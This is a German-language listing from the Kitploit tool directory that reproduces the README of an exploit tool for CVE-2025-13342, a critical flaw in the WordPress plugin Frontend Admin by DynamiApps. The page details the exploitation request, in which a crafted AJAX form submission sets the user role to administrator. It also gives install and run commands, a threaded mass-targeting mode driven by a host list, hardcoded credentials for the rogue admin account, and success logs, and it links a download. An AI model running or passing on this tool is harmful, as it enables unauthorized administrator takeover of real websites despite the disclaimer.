Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-13342 — Frontend Admin by DynamiApps <= 3.28.20 - Nicht authentifizierte beliebige Optionsaktualisierung | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-13342
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubnxploited/cve-2025-13342

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - Nicht authentifizierte beliebige Optionsaktualisierung

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - Nicht authentifizierte Aktualisierung beliebiger Optionen

⚡ CVE-2025-13342

Frontend Admin by DynamiApps — Nicht authentifizierte Erstellung von Administratoren

root@kitploit:~
   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__

CVE CVSS Plugin []

Auth
Python

◈ Schwachstelle

FeldDetail
CVE-IDCVE-2025-13342
Bewertung9.8 KRITISCH — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
BetroffenFrontend Admin by DynamiApps ≤ 3.28.20
AuthentifizierungKeine — vollständig ohne Authentifizierung
TypUnzureichende Capability-Prüfung + Eingabevalidierung → Beliebige Option schreiben
CWECWE-284 · Unzureichende Zugriffskontrolle

Was passiert:
ActionOptions::run()-Speicherhandler prüft weder Benutzerfähigkeiten noch validiert er die Eingabe, bevor er in wp_options schreibt. Ein öffentliches ACF-Frontend-Formular wird zu einem offenen Schreibkanal. Der Angreifer setzt users_can_register=1 und default_role=administrator und registriert dann ein neues Konto, das automatisch die Administrator-Rolle erhält.

Dieses Tool überspringt diesen zweistufigen Ansatz — es sendet direkt die erstellte Formularnutzlast mit role=administrator, die über acff[user][field_*] in die Benutzererstellungsfelder injiziert wird, und erstellt so in einem einzigen AJAX-Aufruf ein Administratorkonto.


◈ Wie der Exploit funktioniert

root@kitploit:~
1. Crawl common registration paths  →  locate ACF frontend form
2. Parse hidden fields               →  _acf_nonce, _acf_form
3. Map user fields                   →  username · email · password · role
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][<role_field>] = administrator
5. {"success":true}  →  admin account created
6. Log to acf_success.txt

◈ Voraussetzungen

root@kitploit:~
requests
beautifulsoup4
colorama
rich
root@kitploit:~
pip install requests beautifulsoup4 colorama rich

◈ Installation & Start

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py

◈ Verwendung

Das Tool ist interaktiv. Ihnen werden vier Fragen gestellt:

root@kitploit:~
Targets file path    →  list.txt
Threads              →  10
Timeout (seconds)    →  10
Verbose debug        →  y / N

Die Anmeldedaten sind intern festgelegt:

FeldWert
BenutzernameNxadmin1
E-Mail[email protected]
PasswortNxAdmin_1337#KSA

◈ Zieldatei

Ein Host pro Zeile — Schema optional:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

◈ Durchsuchte Registrierungspfade

Das Tool durchsucht 28 Pfade pro Ziel der Reihe nach und stoppt beim ersten gültigen ACF-Formular:

root@kitploit:~
/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...

◈ Ausgabe

DateiInhalt
acf_success.txtBestätigte erfolgreiche Administratorerstellungen

Format:

root@kitploit:~
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}

Terminal:

root@kitploit:~
[+] Target base:  https://target.com
[+] Found form at: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] SUCCESS:  https://target.com

[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com

◈ Kontakt

AutorNxploited (Khaled Alenazi)
GitHubgithub.com/Nxploited
Telegram@KNxploited

◈ Haftungsausschluss

Dieses Tool wird nur für autorisierte Sicherheitsforschung und zu Bildungszwecken bereitgestellt.
Der Autor übernimmt keine Verantwortung für eine Nutzung gegen Systeme ohne ausdrückliche schriftliche Genehmigung des Eigentümers.
Unbefugter Zugriff ist nach dem CFAA, CMA und entsprechenden Gesetzen weltweit illegal.
Sie sind allein für Ihre Handlungen verantwortlich.


© 2025 Nxploited · Frontend Admin von DynamiApps ≤ 3.28.20 · Behoben in 3.28.21
Tool herunterladen